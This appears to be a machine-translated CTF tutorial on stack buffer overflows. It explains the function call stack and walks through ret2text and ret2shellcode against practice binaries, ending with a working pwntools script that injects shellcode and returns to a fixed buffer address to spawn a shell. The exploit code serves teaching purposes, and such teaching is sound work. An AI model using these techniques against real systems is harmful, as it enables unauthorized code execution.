1 C Language function call stack

32 Function stack structure under bit .

Operation process .

2 ret2text

out of buffer （Buffer overflow）
The essence is to write extra long data to a fixed length buffer , The excess data overwrites the legal memory area

• Stack overflow （Stack overflow）
  Most common 、 Highest vulnerability ratio 、 The most harmful binary vulnerability
  stay CTF PWN Is often the basis of vulnerability exploitation
• Heap overflow （Heap overflow）
  The heap manager is complex , Various patterns are used
  CTF PWN Common questions in
• Data Segment overflow
  The attack effect depends on Data paragraph What control data is stored on the
  
  Tampering with the return address on the stack frame is an existing backdoor function in the program .
  
  
  

First , We have such a document in our hands ret2text.


Throw in IDA in , Get the code , Three functions are useful .

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  puts("Have you heard of buffer overflow?");
  vulnerable();
  puts("It seems that you know nothing about it ......");
  return 0;
}

int vulnerable()
{
    
  char buffer[8]; // [esp+8h] [ebp-10h] BYREF

  gets(buffer);
  return 0;
}

int get_shell()
{
    
  system("/bin/sh");
  return 0;
}

We turn on gdb, debug .

Input n Skip until you reach the fragile function .

Input s Enter function .

View stack .

Specify what needs to be entered payload.

Use Python The attack , Finally get shell.

You can also write scripts , Logic is the same .

3 ret2shellcode

pwntools Generate shellcode.32 position .

asm(shellcraft.sh())

64 position

context.arch = "amd64"
shellcraft.amd64.sh()

We will ret2shellcode Put in IDA in .

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets(s);
  strncpy(buf2, s, 0x64u);
  printf("bye bye ~");
  return 0;
}

Suppose that the server is opened aslr Protect .
Enable gdb Dynamic debugging .


Dynamic debugging results and ida The results are different , We are subject to the dynamic debugging results .
Write a script ：

from pwn import *

sh = process("./ret2shellcode")
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112,b'A') + p32(buf2_addr))
sh.interactive() 

Successful attack .